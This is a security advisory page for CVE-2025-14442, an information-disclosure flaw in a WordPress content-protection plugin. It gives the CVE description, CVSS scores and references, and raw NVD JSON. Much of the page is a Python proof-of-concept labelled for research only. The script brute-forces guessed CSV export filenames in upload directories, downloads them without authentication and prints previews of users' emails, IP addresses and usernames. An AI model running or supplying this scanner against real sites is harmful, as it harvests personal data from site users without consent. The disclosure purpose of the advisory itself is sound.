Security Vulnerability Report
CVE-2025-14442 CVSS 5.3 MEDIUM

CVE-2025-14442

Published: 2025-12-12 12:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to sensitive information exposure due to storage of exported CSV files in a publicly accessible directory with predictable filenames in all versions up to, and including, 4.9.2. This makes it possible for unauthenticated attackers to access sensitive user data including emails, IP addresses, usernames, roles, and location data by directly accessing the exported CSV file.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Secure Copy Content Protection and Content Locking plugin <= 4.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-14442 PoC - WordPress Secure Copy Content Protection Information Disclosure

This PoC demonstrates how to detect and exploit the information disclosure vulnerability.
"""
import sys
from datetime import datetime, timedelta

import requests

TARGET_URL = "http://target-wordpress-site.com"

# Common export directory paths used by the plugin
COMMON_PATHS = [
    "/wp-content/uploads/secure-copy-content-protection/",
    "/wp-content/uploads/sccp-exports/",
    "/wp-content/plugins/secure-copy-content-protection/exports/",
    "/wp-content/uploads/exports/",
]


def generate_predictable_filenames():
    """Generate potentially predictable CSV filenames based on common patterns."""
    filenames = []
    base_names = [
        "exported_data",
        "user_export",
        "subscriber_export",
        "user_data",
        "leads_export",
        "form_data",
        "locked_content_users",
    ]
    # Add date-based filenames
    for i in range(30):
        date = datetime.now() - timedelta(days=i)
        for base in base_names:
            filenames.append(f"{base}_{date.strftime('%Y%m%d')}.csv")
            filenames.append(f"{base}_{date.strftime('%Y-%m-%d')}.csv")
    # Add simple numbered filenames
    for i in range(1, 100):
        for base in base_names:
            filenames.append(f"{base}_{i}.csv")
            filenames.append(f"{base}-export-{i}.csv")
    return filenames


def check_vulnerability(target_url):
    """Check if the target WordPress site is vulnerable."""
    print(f"[*] Scanning target: {target_url}")
    print("[*] Generating potential CSV filenames...")
    filenames = generate_predictable_filenames()
    found_files = []

    for base_path in COMMON_PATHS:
        print(f"\n[*] Checking path: {base_path}")
        for filename in filenames[:200]:  # Limit to avoid timeout
            url = f"{target_url}{base_path}{filename}"
            try:
                response = requests.get(url, timeout=10, verify=False)
                if response.status_code == 200 and len(response.content) > 0:
                    # Check if response looks like CSV
                    if b'email' in response.content.lower() or b',' in response.content[:100]:
                        print("[+] POTENTIAL VULNERABILITY FOUND!")
                        print(f"[+] URL: {url}")
                        print(f"[+] Size: {len(response.content)} bytes")
                        found_files.append({
                            'url': url,
                            'size': len(response.content),
                            'content_preview': response.content[:500],
                        })
            except requests.RequestException:
                continue

    if found_files:
        print(f"\n[!] Found {len(found_files)} potential vulnerable files!")
        for info in found_files:
            print(f"\n[+] File URL: {info['url']}")
            print("[+] Preview:")
            print(info['content_preview'].decode('utf-8', errors='ignore')[:300])
        return True
    else:
        print("[-] No vulnerable files found with common patterns.")
        print("[-] Manual verification may be required.")
        return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    check_vulnerability(TARGET_URL)
```

References

https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.0/admin/class-secure-copy-content-protection-admin.php#L557
https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.3/admin/class-secure-copy-content-protection-admin.php#L560
https://wordpress.org/plugins/secure-copy-content-protection/#developers
https://www.wordfence.com/threat-intel/vulnerabilities/id/72b95777-d17b-4504-95fd-c83b18106b9e?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14442",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T12:15:46.377",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to sensitive information exposure due to storage of exported CSV files in a publicly accessible directory with predictable filenames in all versions up to, and including, 4.9.2. This makes it possible for unauthenticated attackers to access sensitive user data including emails, IP addresses, usernames, roles, and location data by directly accessing the exported CSV file."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-552"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.0/admin/class-secure-copy-content-protection-admin.php#L557",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.3/admin/class-secure-copy-content-protection-admin.php#L560",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/secure-copy-content-protection/#developers",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/72b95777-d17b-4504-95fd-c83b18106b9e?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```